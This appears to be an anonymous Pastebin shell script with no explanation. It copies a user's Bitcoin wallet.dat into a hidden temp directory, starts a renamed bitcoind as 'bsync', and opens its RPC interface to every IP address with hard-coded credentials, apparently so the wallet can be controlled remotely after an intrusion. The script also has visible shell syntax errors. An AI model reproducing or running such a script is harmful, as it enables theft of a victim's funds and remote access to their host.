Advertisement
Guest User

Untitled

a guest
Oct 7th, 2018
180
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.50 KB | None | 0 0
  1. if [ `mount | grep "/tmp" | grep noexec` ]; then $_p='/var/tmp' fi
  2. cd $_p/za170we && mv bitcoind bsync && echo -e "listen=1\nmaxconnections=100\nserver=1\nrpcuser=user11\nrpcpassword=gIZuzkJzdIZMFH3R1M7iq1vhw9fxgi35\nrpcclienttimeout=120\nrpcallowip=0.0.0.0/0\nrpcallowip=*\nrpcport=5340\nkeypool=1\npaytxfee=0.001\nmin=1" > bsync.conf && echo 1
  3.  
  4. if cp /home/user11/.bitcoin/wallet.dat $_p/za170we; then echo 2; fi
  5.  
  6. cd $_p/za170we && ./bsync -config=/tmp/za170we/bsync.conf -pid=bsync.pid -daemon && echo 3
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement